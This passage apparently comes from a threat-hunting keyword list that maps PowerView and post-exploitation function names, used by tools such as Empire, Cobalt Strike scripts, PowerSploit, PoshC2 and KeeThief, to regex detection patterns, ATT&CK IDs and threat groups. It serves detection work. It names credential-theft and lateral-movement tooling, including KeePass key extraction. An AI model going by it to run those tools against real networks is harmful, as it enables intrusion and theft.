Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-Fruit.ps1*",".{0,1000}Find\-Fruit\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findgpocomputeradmin*",".{0,1000}findgpocomputeradmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers 
during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-InsecureResourceDelegations*",".{0,1000}Find\-InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findinterestingdomainsharefile*",".{0,1000}findinterestingdomainsharefile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*find-interestingfile -*",".{0,1000}find\-interestingfile\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*Find-LocalAdminAccess *",".{0,1000}Find\-LocalAdminAccess\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - 
T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-LocalAdminAccess.ps1*",".{0,1000}Find\-LocalAdminAccess\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Find-LogonScriptCredentials -LogonScripts*",".{0,1000}Find\-LogonScriptCredentials\s\-LogonScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-LogonScriptCredentials.ps1*",".{0,1000}Find\-LogonScriptCredentials\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*FindModule *.dll*",".{0,1000}FindModule\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
